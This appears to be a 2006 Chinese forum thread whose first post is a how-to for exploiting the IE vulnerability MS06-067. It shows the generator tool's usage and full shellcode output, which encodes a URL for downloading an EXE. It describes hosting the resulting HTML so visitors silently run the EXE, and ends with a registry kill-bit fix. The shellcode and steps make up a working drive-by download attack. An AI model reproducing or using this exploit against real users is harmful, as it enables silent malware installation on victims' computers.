| s1005t 发表于 2006-12-2 17:21 只看TA 1楼 |
|---|
|
|
[交流] 令人汗顏的IE最新漏洞(MS06-067)利用測試 这个漏洞太恐怖了,恐怖的让我不敢写出来,考虑到马上网上这样的工具都会泛滥,还是提前告诉大家比较好,我不详细的利用过程,如果你接触过类似的,肯定是会使用的,再次奉劝大家,测试为主,不要乱挂马,危害他人!受影响的系统: Microsoft Windows 2000 Service Pack 4 Microsoft Windows XP Service Pack 2 Microsoft Windows XP Professional x64 Edition Microsoft Windows Server 2003 Microsoft Windows Server 2003 Service Pack 1 Microsoft Windows Server 2003(用于基于 Itanium 的系统) Microsoft Windows Server 2003 SP1(用于基于 Itanium 的系统) Microsoft Windows Server 2003 x64 Edition 受影响软件: Microsoft Internet Explorer 6.0 SP1 Microsoft Internet Explorer 6.0 Microsoft Internet Explorer 5.0.1 SP4 不受影响软件: Internet Explorer 7 ------------- 利用过程如下,刚才写的时候突然断网,重新写一次,郁闷。。 1、首先把一个你需要运行的EXE文件放在网上,得到地址: <a href="http://www.1steam.cn/tools/jhzj.exe(我这里测试用的是按钮突破专家)。" target="_blank">http://www.1steam.cn/tools/jhzj.exe(我这里测试用的是按钮突破专家)。 2、接着看下这个生成工具(LION提供的,谢)的使用方法: CODE: [Copy to clipboard] -------------------------------------------------------------------------------- Usage: e:/ms_exp/06067/ms06067.exe <URL> [htmlfile] <URL>--就是你的EXE的路径,如我这里的“按钮突破专家”的地址: [htmlfile]--需要生成的HTML文件的名称,如我这里的1st.html 3、生成过程,按照上面的格式就可以生成了,过程如下: Quote: E:\Ms_exp\06067>ms06067 http://www.1steam.cn/tools/jhzj.exe 1st.html [+] download url:http://www.1steam.cn/tools/jhzj.exe [+] exploit file:1st.html "%ua3e9%u0000%u5f00%ua164%u0030%u0000%u408b%u8b0c" "%u1c70%u8bad%u0868%uf78b%u046a%ue859%u0043%u0000" "%uf9e2%u6f68%u006e%u6800%u7275%u6d6c%uff54%u9516" "%u2ee8%u0000%u8300%u20ec%udc8b%u206a%uff53%u0456" "%u04c7%u5c03%u2e61%uc765%u0344%u7804%u0065%u3300" "%u50c0%u5350%u5057%u56ff%u8b10%u50dc%uff53%u0856" "%u56ff%u510c%u8b56%u3c75%u748b%u782e%uf503%u8b56" "%u2076%uf503%uc933%u4149%u03ad%u33c5%u0fdb%u10be" "%ud63a%u0874%ucbc1%u030d%u40da%uf1eb%u1f3b%ue775" "%u8b5e%u245e%udd03%u8b66%u4b0c%u5e8b%u031c%u8bdd" "%u8b04%uc503%u5eab%uc359%u58e8%uffff%u8eff%u0e4e" "%uc1ec%ue579%u98b8%u8afe%uef0e%ue0ce%u3660%u2f1a" "%u6870%u7474%u3a70%u2f2f%u7777%u2e77%u7331%u6574" "%u6d61%u632e%u2f6e%u6f74%u6c6f%u2f73%u686a%u6a7a" "%u652e%u6578%u0000"; [+] exploit write to 1st.html success! 看到这句:[+] exploit write to 1st.html success!就说明成功了。可以去ms06067.exe的目录下,看到生成的HTML文件1st.html。 4、把这个HTML文件放在网上,给人家访问就可以了,我这里的这个测试网页地址在: http://www.1steam.cn/modiy/1st.html ,你可以打开看看效果,如果你能看到运行的“按钮突破专家”,说明成功。 5、修补 官方已经除了补丁,地址在:http://www.microsoft.co.ke/china ... letin/MS06-067.mspx。 或者修补如下(LION提供的,再谢): 请将以下文本粘贴于记事本等文本编辑器中。然后,使用.reg文件扩展名保存文件: CODE: [Copy to clipboard] -------------------------------------------------------------------------------- [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{D7A7D7C3-D47F-11D0-89D3-00A0C90833E6}] "Compatibility Flags"=dword:00000400 双击此.reg文件将其应用到各个系统。 PS:这个漏洞,运行EXE不闪,也不弹窗,不声不响的,太恐怖了! |
| 0 |
| 作者的其他主题 |
|---|
| 90后妹子手把手教你組裝台式電腦[30P] |
| 独特新颖的构思!笔记本新奇外设推荐[14P] |
| 有史以来最伟大的23款显卡[23P] |
| 你不知道正常!鲜为人知的笔记本二三事[21P] |
| 敢说你都知道?手机发展史各种第一次[31P] |
| 追忆往昔!浅谈收音机的百年发展历史[13P] |
| shaojidaselang 发表于 2006-12-3 15:04 只看TA 3楼 |
|---|
|
:s_6: 看不懂,只好等哪位高手给个简单的做法 |
| 0 |
|
|---|
